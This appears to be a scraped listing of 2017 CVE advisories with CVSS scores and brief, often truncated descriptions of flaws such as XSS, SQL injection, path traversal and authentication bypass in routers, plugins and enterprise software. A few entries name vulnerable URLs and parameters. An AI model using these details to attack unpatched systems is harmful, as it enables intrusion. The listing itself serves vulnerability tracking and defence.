In EPESI 1.8.2 rev20170830, there is Stored XSS in the Tasks Phonecall Notes Title parameter.
22-09-2017 - 15:29 22-09-2017 - 15:29
CVE-2017-14619 4.3
Cross-site scripting (XSS) vulnerability in phpMyFAQ through 2.9.8 allows remote attackers to inject arbitrary web script or HTML via the "Title of your FAQ" field in the Configuration Module.
20-09-2017 - 17:29 20-09-2017 - 17:29
CVE-2017-14618 3.5
Cross-site scripting (XSS) vulnerability in inc/PMF/Faq.php in phpMyFAQ through 2.9.8 allows remote attackers to inject arbitrary web script or HTML via the Questions field in an "Add New FAQ" action.
20-09-2017 - 17:29 20-09-2017 - 17:29
CVE-2015-7347 3.5
Cross-site scripting (XSS) vulnerability in ZCMS JavaServer Pages Content Management System 1.1.
20-09-2017 - 14:29 20-09-2017 - 14:29
CVE-2015-2826 5.0
WordPress Simple Ads Manager plugin 2.5.94 and 2.5.96 allows remote attackers to obtain sensitive information.
20-09-2017 - 14:29 20-09-2017 - 14:29
CVE-2015-4075 6.8
The Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to write to arbitrary .ini files via a crafted language.save task.
20-09-2017 - 12:29 20-09-2017 - 12:29
CVE-2015-4074 5.0
Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
20-09-2017 - 12:29 20-09-2017 - 12:29
CVE-2015-4073 7.5
Multiple SQL injection vulnerabilities in the Helpdesk Pro plugin before 1.4.0 for Joomla! allow remote attackers to execute arbitrary SQL commands via the (1) ticket_code or (2) email parameter or (3) remote authenticated users to execute arbitrary
20-09-2017 - 12:29 20-09-2017 - 12:29
CVE-2015-4072 3.5
Multiple cross-site scripting (XSS) vulnerabilities in the Helpdesk Pro plugin before 1.4.0 for Joomla! allow remote attackers to inject arbitrary web script or HTML via vectors related to name and message.
20-09-2017 - 12:29 20-09-2017 - 12:29
CVE-2015-4685 4.4
Polycom RealPresence Resource Manager (aka RPRM) before 8.4 allows local users with access to the plcm account to gain privileges via a script in /var/polycom/cma/upgrade/scripts, related to a sudo misconfiguration.
19-09-2017 - 15:29 19-09-2017 - 15:29
CVE-2015-4684 5.5
Multiple directory traversal vulnerabilities in Polycom RealPresence Resource Manager (aka RPRM) before 8.4 allow (1) remote authenticated users to read arbitrary files via a .. (dot dot) in the Modifier parameter to PlcmRmWeb/FileDownload; or remote
19-09-2017 - 15:29 19-09-2017 - 15:29
CVE-2015-4683 7.5
Polycom RealPresence Resource Manager (aka RPRM) before 8.4 allows attackers to obtain sensitive information and potentially gain privileges by leveraging use of session identifiers as parameters with HTTP GET requests.
19-09-2017 - 15:29 19-09-2017 - 15:29
CVE-2015-4682 4.0
Polycom RealPresence Resource Manager (aka RPRM) before 8.4 allows remote authenticated users to obtain the installation path via an HTTP POST request to PlcmRmWeb/JConfigManager.
19-09-2017 - 15:29 19-09-2017 - 15:29
CVE-2015-4681 7.2
Polycom RealPresence Resource Manager (aka RPRM) before 8.4 allows local users to have unspecified impact via vectors related to weak passwords.
19-09-2017 - 15:29 19-09-2017 - 15:29
CVE-2017-14143 7.5
The getUserzoneCookie function in Kaltura before 13.2.0 uses a hardcoded cookie secret to validate cookie signatures, which allows remote attackers to bypass an intended protection mechanism and consequently conduct PHP object injection attacks and e
19-09-2017 - 11:29 19-09-2017 - 11:29
CVE-2014-9619 6.5
Unrestricted file upload vulnerability in webadmin/ajaxfilemanager/ajaxfilemanager.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote authenticated users with admin privileges on the Cloud Manager web console to
19-09-2017 - 11:29 19-09-2017 - 11:29
CVE-2014-9618 7.5
The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.
19-09-2017 - 11:29 19-09-2017 - 11:29
CVE-2014-9611 7.5
Netsweeper before 4.0.5 allows remote attackers to bypass authentication and create arbitrary accounts and policies via a request to webadmin/nslam/index.php.
19-09-2017 - 11:29 19-09-2017 - 11:29
CVE-2014-9610 5.0
Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and remove IP addresses from the quarantine via the ip parameter to webadmin/user/quarantine_disable.php.
19-09-2017 - 11:29 19-09-2017 - 11:29
CVE-2017-12615 6.8
When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP
19-09-2017 - 09:29 19-09-2017 - 09:29
CVE-2017-9798 5.0
Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2
18-09-2017 - 11:29 18-09-2017 - 11:29
CVE-2017-14244 10.0
An authentication bypass vulnerability on iBall Baton ADSL2+ Home Router FW_iB-LR7011A_1.0.2 devices potentially allows attackers to directly access administrative router settings by crafting URLs with a .cgi extension, as demonstrated by /info.cgi a
17-09-2017 - 15:29 17-09-2017 - 15:29
CVE-2017-14243 10.0
An authentication bypass vulnerability on UTStar WA3002G4 ADSL Broadband Modem WA3002G4-0021.01 devices allows attackers to directly access administrative settings and obtain cleartext credentials from HTML source, as demonstrated by info.cgi, upload
17-09-2017 - 15:29 17-09-2017 - 15:29
CVE-2014-9463 9.0
functions_vbseo_hook.php in the VBSEO module for vBulletin allows remote authenticated users to execute arbitrary code via the HTTP Referer header to visitormessage.php.
15-09-2017 - 16:29 15-09-2017 - 16:29
CVE-2017-1002003 7.5
Vulnerability in wordpress plugin wp2android-turn-wp-site-into-android-app v1.1.4, The plugin includes unlicensed vulnerable CMS software from http://www.invedion.com.
14-09-2017 - 09:29 14-09-2017 - 09:29
CVE-2017-1002002 7.5
Vulnerability in wordpress plugin webapp-builder v2.0, The plugin includes unlicensed vulnerable CMS software from http://www.invedion.com/
14-09-2017 - 09:29 14-09-2017 - 09:29
CVE-2017-1002001 7.5
Vulnerability in wordpress plugin mobile-app-builder-by-wappress v1.05, The plugin includes unlicensed vulnerable CMS software from http://www.invedion.com.
14-09-2017 - 09:29 14-09-2017 - 09:29
CVE-2017-1002000 7.5
Vulnerability in wordpress plugin mobile-friendly-app-builder-by-easytouch v3.0, The code in file ./mobile-friendly-app-builder-by-easytouch/server/images.php doesn't require authentication or check that the user is allowed to upload content.
14-09-2017 - 09:29 14-09-2017 - 09:29
CVE-2017-3133 4.3
A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to execute unauthorized code or commands via the Replacement Message HTML for SSL-VPN.
11-09-2017 - 22:29 11-09-2017 - 22:29
CVE-2017-3132 4.3
A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken.
11-09-2017 - 22:29 11-09-2017 - 22:29
CVE-2017-3131 3.5
A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.4.0 through 5.4.4 and 5.6.0 allows attackers to execute unauthorized code or commands via the filter input in "Applications" under FortiView.
11-09-2017 - 22:29 11-09-2017 - 22:29
CVE-2015-8351 6.8
PHP remote file inclusion vulnerability in the Gwolle Guestbook plugin before 1.5.4 for WordPress, when allow_url_include is enabled, allows remote authenticated users to execute arbitrary PHP code via a URL in the abspath parameter to frontend/captc
11-09-2017 - 16:29 11-09-2017 - 16:29
CVE-2017-14219 4.3
XSS (persistent) on the Intelbras Wireless N 150Mbps router with firmware WRN 240 allows attackers to steal wireless credentials without being connected to the network, related to userRpm/popupSiteSurveyRpm.htm and userRpm/WlanSecurityRpm.htm. The at
07-09-2017 - 18:29 07-09-2017 - 18:29
CVE-2015-3314 6.8
SQL injection vulnerability in WordPress Tune Library plugin before 1.5.5.
07-09-2017 - 16:29 07-09-2017 - 16:29
CVE-2015-3313 7.5
SQL injection vulnerability in WordPress Community Events plugin before 1.4.
07-09-2017 - 16:29 07-09-2017 - 16:29
CVE-2017-14147 7.5
An issue was discovered on FiberHome User End Routers Bearing Model Number AN1020-25 which could allow an attacker to easily restore a router to its factory settings by simply browsing to the link http://[Default-Router-IP]/restoreinfo.cgi & execute
07-09-2017 - 10:29 07-09-2017 - 10:29
CVE-2017-13754 3.5
Cross-site scripting (XSS) vulnerability in the "advanced settings - time server" module in Wibu-Systems CodeMeter before 6.50b allows remote attackers to inject arbitrary web script or HTML via the "server name" field in actions/ChangeConfiguration.
07-09-2017 - 09:29 07-09-2017 - 09:29
CVE-2017-13713 6.5
T&W WIFI Repeater BE126 allows remote authenticated users to execute arbitrary code via shell metacharacters in the user parameter to cgi-bin/webupg.
07-09-2017 - 09:29 07-09-2017 - 09:29
CVE-2015-7241 7.5
XML External Entity (XXE) vulnerability in SAP Netweaver before 7.01.
06-09-2017 - 17:29 06-09-2017 - 17:29
CVE-2017-14126 4.3
The Participants Database plugin before 1.7.5.10 for WordPress has XSS.
04-09-2017 - 16:29 04-09-2017 - 16:29
CVE-2014-8677 3.5
The installation process for SOPlanning 1.32 and earlier allows remote authenticated users with a prepared database, and access to an existing database with a crafted name, or permissions to create arbitrary databases, or if PHP before 5.2 is being u
31-08-2017 - 18:29 31-08-2017 - 18:29
CVE-2014-8676 5.0
Directory traversal vulnerability in the file_get_contents function in SOPlanning 1.32 and earlier allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in a URL path parameter.
31-08-2017 - 18:29 31-08-2017 - 18:29
CVE-2014-8675 5.0
Soplanning 1.32 and earlier generates static links for sharing ICAL calendars with embedded login information, which allows remote attackers to obtain a calendar owner's password via a brute-force attack on the embedded password hash.
31-08-2017 - 18:29 31-08-2017 - 18:29
CVE-2017-9979 4.3
On the OSNEXUS QuantaStor v4 virtual appliance before 4.3.1, if the REST call invoked does not exist, an error will be triggered containing the invalid method previously invoked. The response sent to the user isn't sanitized in this case. An attacker
28-08-2017 - 15:29 28-08-2017 - 15:29
CVE-2017-9978 5.0
On the OSNEXUS QuantaStor v4 virtual appliance before 4.3.1, a flaw was found with the error message sent as a response for users that don't exist on the system. An attacker could leverage this information to fine-tune and enumerate valid accounts on
28-08-2017 - 15:29 28-08-2017 - 15:29
CVE-2017-9650 4.6
An Unrestricted Upload of File with Dangerous Type issue was discovered in Automated Logic Corporation (ALC) ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior; ALC WebCTRL, SiteScan Web 6.1 and prior; ALC WebCTRL, i-Vu 6.0 and prior; ALC WebCTRL, i-Vu, S
25-08-2017 - 15:29 25-08-2017 - 15:29
CVE-2015-8352 10.0
Directory traversal vulnerability in Zen Cart 1.5.4 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the act parameter to ajax.php.
24-08-2017 - 17:29 24-08-2017 - 17:29
CVE-2015-7259 9.0
ZTE ADSL ZXV10 W300 modems W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57 allow user accounts to have multiple valid username and password pairs, which allows remote authenticated users to login to a target account via any of its username and pass
24-08-2017 - 16:29 24-08-2017 - 16:29
CVE-2015-7258 9.0
ZTE ADSL ZXV10 W300 modems W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57 allow remote authenticated users to obtain user passwords by displaying user information in a Telnet connection.
24-08-2017 - 16:29 24-08-2017 - 16:29
CVE-2015-7257 8.5
ZTE ADSL ZXV10 W300 modems W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57 allow remote authenticated non-administrator users to change the admin password by intercepting an outgoing password change request, and changing the username parameter from
24-08-2017 - 16:29 24-08-2017 - 16:29
CVE-2017-12984 4.3
PHPMyWind 5.3 has XSS in shoppingcart.php, related to message.php, admin/message.php, and admin/message_update.php.
21-08-2017 - 03:29 21-08-2017 - 03:29
CVE-2015-4071 5.0
The Helpdesk Pro Plugin before 1.4.0 for Joomla! allows remote attackers to read the support tickets of arbitrary users via obtaining the target ticketId, and navigating to http://{target}/component/helpdeskpro/?view=ticket&id={ticketId}.
18-08-2017 - 14:29 18-08-2017 - 14:29
CVE-2017-9767 3.5
Multiple cross-site scripting (XSS) vulnerabilities in Quali CloudShell before 8 allow remote authenticated users to inject arbitrary web script or HTML via the (1) Name or (2) Description parameter to RM/Reservation/ReserveNew; the (3) Description p
18-08-2017 - 12:29 18-08-2017 - 12:29
CVE-2017-12943 5.0
D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password.
18-08-2017 - 11:29 18-08-2017 - 11:29
CVE-2017-6327 6.5
The Symantec Messaging Gateway before 10.6.3-267 can encounter an issue of remote code execution, which describes a situation whereby an individual may obtain the ability to execute commands remotely on a target machine or in a target process. In thi
11-08-2017 - 16:29 11-08-2017 - 16:29
CVE-2014-5144 3.5
Cross-site scripting (XSS) vulnerability in Telescope before 0.9.3 allows remote authenticated users to inject arbitrary web script or HTML via crafted markdown.
09-08-2017 - 14:29 09-08-2017 - 14:29
CVE-2017-11155 5.0
An information exposure vulnerability in index.php in Synology Photo Station before 6.7.3-3432 and 6.3-2967 allows remote attackers to obtain sensitive system information via unspecified vectors.
08-08-2017 - 11:29 08-08-2017 - 11:29
CVE-2017-11154 6.5
Unrestricted file upload vulnerability in PixlrEditorHandler.php in Synology Photo Station before 6.7.3-3432 and 6.3-2967 allows remote attackers to create arbitrary PHP scripts via the type parameter.
08-08-2017 - 11:29 08-08-2017 - 11:29
CVE-2017-11153 7.5
Deserialization vulnerability in synophoto_csPhotoMisc.php in Synology Photo Station before 6.7.3-3432 and 6.3-2967 allows remote attackers to gain administrator privileges via a crafted serialized payload.
08-08-2017 - 11:29 08-08-2017 - 11:29
CVE-2017-11152 5.0
Directory traversal vulnerability in PixlrEditorHandler.php in Synology Photo Station before 6.7.3-3432 and 6.3-2967 allows remote attackers to write arbitrary files via the path parameter.
08-08-2017 - 11:29 08-08-2017 - 11:29
CVE-2017-11151 7.5
A vulnerability in synotheme_upload.php in Synology Photo Station before 6.7.3-3432 and 6.3-2967 allows remote attackers to upload arbitrary files without authentication via the logo_upload action.
08-08-2017 - 11:29 08-08-2017 - 11:29
CVE-2017-10046 4.9
Vulnerability in the Primavera P6 Enterprise Project Portfolio Management component of Oracle Primavera Products Suite (subcomponent: Web Access). Supported versions that are affected are 8.3, 8.4, 15.1, 15.2 and 16.1. Easily exploitable vulnerabilit
08-08-2017 - 11:29 08-08-2017 - 11:29
CVE-2015-7571 6.8
Unrestricted file upload vulnerability in Yeager CMS 1.2.1 allows remote attackers to execute arbitrary code by uploading a file with an executable extension.
07-08-2017 - 16:29 07-08-2017 - 16:29
CVE-2014-9262 5.5
The Duplicator plugin in Wordpress before 0.5.10 allows remote authenticated users to create and download backup files.
07-08-2017 - 13:29 07-08-2017 - 13:29
CVE-2017-11394 10.0
Proxy command injection vulnerability in Trend Micro OfficeScan 11 and XG (12) allows remote attackers to execute arbitrary code on vulnerable installations. The specific flaw can be exploited by parsing the T parameter within Proxy.php. Formerly ZDI
03-08-2017 - 11:29 03-08-2017 - 11:29
CVE-2017-11320 4.3
Persistent XSS through the SSID of nearby Wi-Fi devices on Technicolor TC7337 routers 08.89.17.20.00 allows an attacker to cause DNS Poisoning and steal credentials from the router.
03-08-2017 - 04:29 03-08-2017 - 04:29
CVE-2017-11356 4.0
The application distribution export functionality in PEGA Platform 7.2 ML0 and earlier allows remote authenticated users with certain privileges to obtain sensitive configuration information by leveraging a missing access control.
02-08-2017 - 15:29 02-08-2017 - 15:29
CVE-2017-11355 4.3
Multiple cross-site scripting (XSS) vulnerabilities in PEGA Platform 7.2 ML0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO to the main page; the (2) beanReference parameter to the JavaBean viewer page
02-08-2017 - 15:29 02-08-2017 - 15:29
CVE-2017-11494 7.5
SQL injection vulnerability in SOL.Connect ISET-mpp meter 1.2.4.2 and earlier allows remote attackers to execute arbitrary SQL commands via the user parameter in a login action.
02-08-2017 - 10:29 02-08-2017 - 10:29
CVE-2016-0736 5.0
In Apache HTTP Server versions 2.4.0 to 2.4.23, mod_session_crypto was encrypting its data/cookie using the configured ciphers with possibly either CBC or ECB modes of operation (AES256-CBC by default), hence no selectable or builtin authenticated en
27-07-2017 - 17:29 27-07-2017 - 17:29
CVE-2017-9413 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in the Podcast feature in Subsonic 6.1.1 allow remote attackers to hijack the authentication of users for requests that (1) subscribe to a podcast via the add parameter to podcastReceiverAdmi
25-07-2017 - 14:29 25-07-2017 - 14:29
CVE-2015-2798 7.5
SQL injection vulnerability in Joomla! Component Contact Form Maker 1.0.1 allows remote attackers to execute arbitrary SQL commands via the id parameter.
25-07-2017 - 14:29 25-07-2017 - 14:29
CVE-2015-2280 9.0
snwrite.cgi in AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP network camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the mac parameter.
24-07-2017 - 21:29 24-07-2017 - 21:29
CVE-2015-2279 10.0
cgi_test.cgi in AirLive BU-2015 with firmware 1.03.18, BU-3026 with firmware 1.43, and MD-3025 with firmware 1.81 allows remote attackers to execute arbitrary OS commands via shell metacharacters after an "&" (ampersand) in the write_mac write_pid, w
24-07-2017 - 21:29 24-07-2017 - 21:29
CVE-2017-9554 5.0
An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors.
24-07-2017 - 16:29 24-07-2017 - 16:29
CVE-2017-9415 5.1
Cross-site request forgery (CSRF) vulnerability in subsonic 6.1.1 allows remote attackers with knowledge of the target username to hijack the authentication of users for requests that change passwords via a crafted request to userSettings.view.
21-07-2017 - 10:29 21-07-2017 - 10:29
CVE-2017-7037 6.8
An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue inv
20-07-2017 - 12:29 20-07-2017 - 12:29
CVE-2017-6316 10.0
Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow remote attackers to execute arbitrary shell commands as root via a CGISESSID cookie. On CloudBridge (the former name of NetScaler SD-WAN) devices, the cookie name was CAKEPHP rather than
20-07-2017 - 00:29 20-07-2017 - 00:29
CVE-2017-6320 9.0
A remote command injection vulnerability exists in the Barracuda Load Balancer product line (confirmed on v5.4.0.004 (2015-11-26) and v6.0.1.006 (2016-08-19); fixed in 6.1.0.003 (2017-01-17)) in which an authenticated user can execute arbitrary shell
18-07-2017 - 10:29 18-07-2017 - 10:29
CVE-2017-9813 4.3
In Kaspersky Anti-Virus for Linux File Server before Maintenance Pack 2 Critical Fix 4 (version 8.0.4.312), the scriptName parameter of the licenseKeyInfo action method is vulnerable to cross-site scripting (XSS).
17-07-2017 - 17:29 17-07-2017 - 17:29
CVE-2017-9812 5.0
The reportId parameter of the getReportStatus action method can be abused in the web interface in Kaspersky Anti-Virus for Linux File Server before Maintenance Pack 2 Critical Fix 4 (version 8.0.4.312) to read arbitrary files with kluser privileges.
17-07-2017 - 17:29 17-07-2017 - 17:29
CVE-2017-9811 10.0
The kluser is able to interact with the kav4fs-control binary in Kaspersky Anti-Virus for Linux File Server before Maintenance Pack 2 Critical Fix 4 (version 8.0.4.312). By abusing the quarantine read and write operations, it is possible to elevate t
17-07-2017 - 17:29 17-07-2017 - 17:29
CVE-2017-9810 6.8
There are no Anti-CSRF tokens in any forms on the web interface in Kaspersky Anti-Virus for Linux File Server before Maintenance Pack 2 Critical Fix 4 (version 8.0.4.312). This would allow an attacker to submit authenticated requests when an authenti
17-07-2017 - 17:29 17-07-2017 - 17:29
CVE-2017-11346 7.5
Zoho ManageEngine Desktop Central before build 100092 allows remote attackers to execute arbitrary code via vectors involving the upload of help desk videos.
17-07-2017 - 09:18 17-07-2017 - 09:18
CVE-2017-1000028 5.0
Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
17-07-2017 - 09:18 17-07-2017 - 09:18
CVE-2017-7175 9.0
NfSen before 1.3.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the customfmt parameter (aka the "Custom output format" field).
10-07-2017 - 15:29 10-07-2017 - 15:29
CVE-2017-9791 7.5
The Struts 1 plugin in Apache Struts 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.
10-07-2017 - 12:29 10-07-2017 - 12:29
CVE-2017-10682 7.5
SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter in the comments or status page to cat_options.php.
29-06-2017 - 17:29 29-06-2017 - 17:29
CVE-2017-6086 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in the addAction and purgeAction functions in ViMbAdmin 3.0.15 allow remote attackers to hijack the authentication of logged administrators to (1) add an administrator user via a crafted POST
27-06-2017 - 16:29 27-06-2017 - 16:29
CVE-2017-9833 5.0
/cgi-bin/wapopen in BOA Webserver 0.94.14rc21 allows the injection of "../.." using the FILECAMERA variable (sent by GET) to read files with root privileges.
23-06-2017 - 22:29 23-06-2017 - 22:29
CVE-2015-9098 10.0
In Redgate SQL Monitor before 3.10 and 4.x before 4.2, a remote attacker can gain unauthenticated access to the Base Monitor, resulting in the ability to execute arbitrary SQL commands on any monitored Microsoft SQL Server machines. If the Base Monit
22-06-2017 - 15:29 22-06-2017 - 15:29
CVE-2016-7508 6.0
Multiple SQL injection vulnerabilities in GLPI 0.90.4 allow an authenticated remote attacker to execute arbitrary SQL commands by using a certain character when the database is configured to use Big5 Asian encoding.
21-06-2017 - 16:29 21-06-2017 - 16:29
CVE-2017-9730 7.5
SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier allows remote attackers to execute arbitrary SQL commands via the "r" parameter.
19-06-2017 - 08:29 19-06-2017 - 08:29
CVE-2017-9602 7.5
KBVault Mysql Free Knowledge Base application package 0.16a comes with a FileExplorer/Explorer.aspx?id=/Uploads file-management component. An unauthenticated user can access the file upload and deletion functionality. Through this functionality, a us
16-06-2017 - 09:29 16-06-2017 - 09:29
CVE-2017-9603 6.5
SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress allows authenticated users to execute arbitrary SQL commands via the jobid parameter to wp-admin/edit.php.
13-06-2017 - 14:29 13-06-2017 - 14:29
CVE-2017-9429 6.5
SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress allows an authenticated user to execute arbitrary SQL commands via the id parameter to wp-admin/admin.php.
13-06-2017 - 14:29 13-06-2017 - 14:29
CVE-2017-9418 6.5
SQL injection vulnerability in the WP-Testimonials plugin 3.4.1 for WordPress allows an authenticated user to execute arbitrary SQL commands via the testid parameter to wp-admin/admin.php.
12-06-2017 - 09:29 12-06-2017 - 09:29
CVE-2014-8687 10.0
Seagate Business NAS devices with firmware before 2015.00322 allow remote attackers to execute arbitrary code with root privileges by leveraging use of a static encryption key to create session tokens.
08-06-2017 - 12:29 08-06-2017 - 12:29
CVE-2017-9516 3.5
Craft CMS before 2.6.2982 allows for a potential XSS attack vector by uploading a malicious SVG file.
08-06-2017 - 09:29 08-06-2017 - 09:29
CVE-2015-7346 7.5
SQL injection vulnerability in ZCMS 1.1.
07-06-2017 - 17:29 07-06-2017 - 17:29
CVE-2017-8841 7.5
Arbitrary file deletion exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The attack methodology is absolute path traversal in cgi-bin/MANGA/firmwar
05-06-2017 - 10:29 05-06-2017 - 10:29
CVE-2017-8840 5.0
Debug information disclosure exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. A direct request to cgi-bin/HASync/hasync.cgi?debug=1 shows Master LA
05-06-2017 - 10:29 05-06-2017 - 10:29
CVE-2017-8839 4.3
XSS via orig_url exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The affected script is guest/preview.cgi.
05-06-2017 - 10:29 05-06-2017 - 10:29
CVE-2017-8838 4.3
XSS via syncid exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The affected script is cgi-bin/HASync/hasync.cgi.
05-06-2017 - 10:29 05-06-2017 - 10:29
CVE-2017-8837 5.0
Cleartext password storage exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The files in question are /etc/waipass and /etc/roapass. In case one of
05-06-2017 - 10:29 05-06-2017 - 10:29
CVE-2017-8836 6.8
CSRF exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The CGI scripts in the administrative interface are affected. This allows an attacker to exec
05-06-2017 - 10:29 05-06-2017 - 10:29
CVE-2017-8835 7.5
SQL injection exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. An attack vector is the bauth cookie to cgi-bin/MANGA/admin.cgi. One impact is enume
05-06-2017 - 10:29 05-06-2017 - 10:29
CVE-2016-6256 6.8
SAP Business One for Android 1.2.3 allows remote attackers to conduct XML External Entity (XXE) attacks via crafted XML data in a request to B1iXcellerator/exec/soap/vP.001sap0003.in_WCSX/com.sap.b1i.vplatform.runtime/INB_WS_CALL_SYNC_XPT/INB_WS_CALL
25-05-2017 - 21:29 25-05-2017 - 21:29
CVE-2017-1092 10.0
IBM Informix Open Admin Tool 11.5, 11.7, and 12.1 could allow an unauthorized user to execute arbitrary code as system admin on Windows servers. IBM X-Force ID: 120390.
22-05-2017 - 16:29 22-05-2017 - 16:29
CVE-2017-2528 4.3
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site t
22-05-2017 - 01:29 22-05-2017 - 01:29
CVE-2017-2515 6.8
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cau
22-05-2017 - 01:29 22-05-2017 - 01:29
CVE-2017-2510 4.3
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site t
22-05-2017 - 01:29 22-05-2017 - 01:29
CVE-2017-2508 4.3
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site t
22-05-2017 - 01:29 22-05-2017 - 01:29
CVE-2017-2504 4.3
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to conduct Universal XSS (UXSS)
22-05-2017 - 01:29 22-05-2017 - 01:29
CVE-2017-9101 7.5
import.php (aka the Phonebook import feature) in PlaySMS 1.4 allows remote code execution via vectors involving the User-Agent HTTP header and PHP code in the name of a file.
21-05-2017 - 14:29 21-05-2017 - 14:29
CVE-2017-7620 4.3
MantisBT before 1.3.11, 2.x before 2.3.3, and 2.4.x before 2.4.1 omits a backslash check in string_api.php and consequently has conflicting interpretations of an initial \/ substring as introducing either a local pathname or a remote hostname, which
21-05-2017 - 10:29 21-05-2017 - 10:29
CVE-2017-9100 8.3
login.cgi on D-Link DIR-600M devices with firmware 3.04 allows remote attackers to bypass authentication by entering more than 20 blank spaces in the password field during an admin login attempt.
21-05-2017 - 00:29 21-05-2017 - 00:29
CVE-2017-5174 7.5
An Authentication Bypass issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An authentication bypass vulnerability has been identified. The existing file system architecture could allow attackers to bypass the access contr
18-05-2017 - 23:29 18-05-2017 - 23:29
CVE-2017-5173 10.0
An Improper Neutralization of Special Elements (in an OS command) issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An improper neutralization of special elements vulnerability has been identified. If special elements are
18-05-2017 - 23:29 18-05-2017 - 23:29
CVE-2017-9072 4.3
Two CalendarXP products have XSS in common parts of HTML files. CalendarXP FlatCalendarXP through 9.9.290 has XSS in iflateng.htm and nflateng.htm. CalendarXP PopCalendarXP through 9.8.308 has XSS in ipopeng.htm and npopeng.htm.
18-05-2017 - 13:29 18-05-2017 - 13:29
CVE-2017-8917 7.5
SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors.
17-05-2017 - 19:29 17-05-2017 - 19:29
CVE-2017-8382 3.5
admidio 3.2.8 has CSRF in adm_program/modules/members/members_function.php with an impact of deleting arbitrary user accounts.
16-05-2017 - 06:29 16-05-2017 - 06:29
CVE-2017-7953 3.5
INFOR EAM V11.0 Build 201410 has XSS via comment fields.
